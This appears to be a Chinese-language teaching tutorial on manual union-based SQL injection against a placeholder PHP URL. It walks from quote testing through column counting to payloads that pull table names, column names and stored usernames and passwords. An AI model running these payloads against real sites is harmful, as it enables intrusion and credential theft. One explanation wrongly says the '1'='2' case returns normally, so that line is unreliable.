一、判断是否存在SQL注入
最为经典的单引号判断法:
在参数后面加上单引号,比如: http://xxx/abc.php?id=1' 如果页面返回错误,则存在 Sql 注入。
原因是无论字符型还是整型都会因为单引号个数不匹配(未闭合)而报错。
(如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号做了过滤,这时可以使用判断语句进行注入...待完善)
二、判断SQL注入漏洞的类型
1.数字型判断
Url 地址中输入 http://xxx/abc.php?id=1 and 1=1
页面依旧运行正常,继续进行下一步。
Url 地址中输入 http://xxx/abc.php?id=1 and 1=2
页面运行错误,则说明此 Sql 注入为数字型注入。
说明:当输入 and 1=1时,后台执行 Sql 语句:select * from <表名> where id = 1 and 1=1 没有语法错误且逻辑判断为正确,所以返回正常。
当输入 and 1=2时,后台执行 Sql 语句:select * from <表名> where id = 1 and 1=2 没有语法错误但是逻辑判断为假,所以返回错误。
2.字符型判断
Url 地址中输入 http://xxx/abc.php?id= 1' and '1'='1
页面运行正常,继续进行下一步。
Url 地址中输入 http://xxx/abc.php?id= 1' and '1'='2
页面运行错误,则说明此 Sql 注入为字符型注入。
说明:当输入 and ‘1’='1时,后台执行 Sql 语句:select * from <表名> where id = '1' and '1'='1'语法正确,逻辑判断正确,所以返回正确。
当输入 and ‘1’='2时,后台执行 Sql 语句:select * from <表名> where id = '1' and '1'='2'语法正确,但逻辑判断错误,所以返回正确。同学们同样可以使用假设法来验证。
三、进行拼串,确定查询数据的列数(字段数)
Url 地址中输入 http://xxx/abc.php?id=1 order by 100
-- -(采用二分查找法,确定列数)
四、在已知的列数/字段判断可显示位
Url 地址中输入 http://xxx/abc.php?id=-1
union select 1,2,3,4-- -(假设确定的列数为4)
五、在“显示位”显示“数据库”名
Url 地址中输入 http://xxx/abc.php?id=-1
union select 1,2,database(),4-- -
六、在“显示位”显示“表”名
Url 地址中输入 http://xxx/abc.php?
id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -
七、在“显示位”显示“字段”名
Url 地址中输入 http://xxx/abc.php?
id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="表名"-- -
八、在“显示位”显示“账号、密码”
Url 地址中输入 http://xxx/abc.php?
id=-1' union select 1,group_concat(name),group_concat(password),4 from "表名"-- -